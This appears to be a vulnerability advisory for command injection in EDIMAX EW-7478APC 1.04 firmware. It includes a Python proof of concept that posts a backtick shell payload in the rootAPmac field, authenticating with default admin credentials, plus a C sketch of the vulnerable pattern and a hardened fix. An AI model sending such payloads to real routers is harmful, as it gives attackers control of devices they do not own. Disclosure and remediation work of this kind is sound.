Overview

Affected version

EW-7478APC 1.04

Vulnerability details

The EDIMAX EW-7478APC 1.04 firmware has a command injection vulnerability in the formStaDrvSetup function. The variable v71 receives the rootAPmac parameter from a POST request. Because the user fully controls this value and it is passed to system() without sanitization, shell metacharacters in rootAPmac are interpreted by the shell, resulting in command injection.



POC

import requests

# Target router address (default LAN address used in the original PoC).
ip = "192.168.2.1"

# Form fields expected by /goform/formStaDrvSetup. Only rootAPmac is
# attacker-controlled in a meaningful way: its value reaches system()
# unsanitized, so the backticks are evaluated by the shell.
data = {
    "stadrv_band":    "0",
    "stadrv_type":    "0",
    "wiz_wispManu":   "0",
    "WISP_enable5g":  "0",
    "WISPMANU":       "",
    "rootAPmac":      "'`ps>/1.txt`'",
    "submit-url":     "/",
    "isApply":        "",
    "stadrv_clonemac":    "",
    "stadrv_ssid":        "",
    "stadrv_chan":         "",
    "stadrv_encrypttype": "",
}
url = f'http://{ip}/goform/formStaDrvSetup'

# The endpoint requires HTTP basic auth (default credentials shown).
res = requests.post(url=url, data=data, auth=("admin", "1234"), verify=False)
print(res)
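To show why the rootAPmac value is dangerous and what the fix looks like, here is an added illustration in C (not the firmware's actual code): the vulnerable string-building pattern beside a hardened version that allow-lists the MAC format and invokes the helper without a shell. The helper name "sta_setup", its path and its "--bssid" option are placeholders assumed for the example.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern (illustrative, not the firmware's code): the POST value is
 * pasted into a shell command, so '`ps>/1.txt`' from the PoC becomes part of
 * what system() would run. The command is only built here, never executed. */
int build_cmd_unsafely(const char *root_ap_mac, char *out, size_t outlen)
{
    /* "sta_setup" is a placeholder for whatever helper the firmware invokes. */
    return snprintf(out, outlen, "sta_setup --bssid=%s", root_ap_mac);
}

/* Hardened form, step 1: allow-list validation. A BSSID is exactly six hex
 * octets separated by colons (17 chars); quotes, backticks, spaces and
 * redirections can never pass this check. */
bool is_valid_mac(const char *s)
{
    if (s == NULL || strlen(s) != 17) return false;
    for (int i = 0; i < 17; i++) {
        bool sep = (i % 3 == 2);
        if (sep ? s[i] != ':' : !isxdigit((unsigned char)s[i]))
            return false;
    }
    return true;
}

/* Hardened form, step 2: no shell at all. The validated value is one argv
 * element for execv(), so the kernel receives it verbatim and nothing is ever
 * interpreted. Returns -1 (running nothing) if validation fails. */
int run_sta_setup_safely(const char *root_ap_mac)
{
    if (!is_valid_mac(root_ap_mac))
        return -1;
    char arg[32];
    snprintf(arg, sizeof arg, "--bssid=%s", root_ap_mac);
    char *const argv[] = { "/sbin/sta_setup", arg, NULL }; /* placeholder path */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv(argv[0], argv);
        _exit(127); /* helper missing in this demo: child exits, no shell involved */
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return status;
}
```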
